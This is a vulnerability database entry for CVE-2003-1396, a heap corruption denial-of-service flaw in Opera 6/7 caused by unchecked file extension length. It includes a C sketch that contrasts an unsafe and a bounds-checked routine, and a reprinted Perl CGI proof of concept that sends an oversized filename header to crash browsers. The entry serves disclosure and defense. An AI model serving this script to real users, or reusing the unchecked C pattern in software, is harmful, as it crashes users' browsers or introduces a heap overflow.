Opera 6/7 File Extension Remote Heap Corruption Vulnerability

Vulnerability ID 1107293 Vulnerability type Buffer overflow
Published 2003-04-28 Updated 2003-12-31
CVE ID CVE-2003-1396
CNNVD-ID CNNVD-200312-195
Platform Windows CVSS score 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/22550
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-195
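|Vulnerability details
Opera is a multi-platform web browser. Opera does not properly check the length of file extensions. A remote attacker can exploit this by building a malicious page and enticing a user to visit it, which triggers heap corruption and causes a denial of service. Opera writes the file name into a heap buffer in wide-character encoding. During this write it does not check the extension length and writes data past the buffer boundary, which can overwrite pointers and corrupt the heap management structures (arbitrary data of the form "XX00XX00" is written), causing Opera to crash and terminate. According to the author's analysis, this vulnerability cannot be used to execute arbitrary code.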
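The missing length check described above, sketched in C beside a bounded version. This is an added example, not Opera's code and not part of the original advisory; the function names, the 16-unit capacity (`EXT_CAP`) and the sample file names are assumptions.

```c
#include <stdint.h>
#include <string.h>

#define EXT_CAP 16 /* assumed capacity in 16-bit units, terminator included */

/* Unsafe pattern, for contrast only (never called here): widens the extension
 * with no capacity check, so a long one writes "XX 00 XX 00" past dst's end. */
void widen_ext_unchecked(const char *name, uint16_t *dst)
{
    const char *ext = strrchr(name, '.');
    while (ext && *ext)
        *dst++ = (unsigned char)*ext++;
    *dst = 0;
}

/* Hardened form: returns units written (terminator excluded), or -1 when the
 * extension does not fit in cap units; dst is then left as an empty string. */
int widen_ext_checked(const char *name, uint16_t *dst, size_t cap)
{
    const char *ext;
    size_t len, i;
    if (!name || !dst || cap == 0)
        return -1;
    dst[0] = 0;
    ext = strrchr(name, '.');
    if (!ext)
        return 0;
    len = strlen(ext);
    if (len >= cap)            /* no room for data plus terminator: reject */
        return -1;
    for (i = 0; i < len; i++)
        dst[i] = (unsigned char)ext[i];
    dst[len] = 0;
    return (int)len;
}

/* Constructed input: "file." followed by n filler bytes (n is clamped to
 * what name[] can hold). Returns the result of widen_ext_checked(). */
int check_filler_ext(size_t n)
{
    char name[0x400] = "file.";
    uint16_t buf[EXT_CAP];

    if (n > sizeof name - 6)
        n = sizeof name - 6;
    memset(name + 5, 'A', n);  /* rest of name[] is already zero */
    return widen_ext_checked(name, buf, EXT_CAP);
}
```

The extension is measured with its leading dot, so the longest one accepted here is 15 units; anything longer is rejected before a single unit is written.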
|Exploit
source: http://www.securityfocus.com/bid/7450/info

A vulnerability has been reported for Opera versions 7.10 and earlier. The problem is said to occur due to insufficient bounds checking on filename extensions. As a result, it may be possible for an attacker to corrupt heap-based memory.

Successful exploitation of this vulnerability may result in a denial of service, possibly prolonged. If a malicious filename entry were placed in a cache file, Opera may continuously crash until the cache file has been deleted.

#!/usr/bin/perl
# Smash Heap Memory.
# This script is a CGI program.

$|=1;
my $filename = "." . "\xCC" x (int(rand(0x20000)) + 0x100);

print "Content-type: text/html\r\n";
print qq~Content-Disposition: filename="$filename"\r\n~;
print "\r\n";
print "<html><body>Love & Peace :)</body></html>\r\n";
|References

Source: BID
Name: 7450
Link: http://www.securityfocus.com/bid/7450
Source: XF
Name: opera-file-extension-bo(11894)
Link: http://xforce.iss.net/xforce/xfdb/11894
Source: BUGTRAQ
Name: 20030427 [Opera 7/6] Long File Extension Heap Buffer Overrun Vulnerability in Download.
Link: http://archives.neohapsis.com/archives/bugtraq/2003-04/0346.html
Source: NSFOCUS
Name: 4771
Link: http://www.nsfocus.net/vulndb/4771
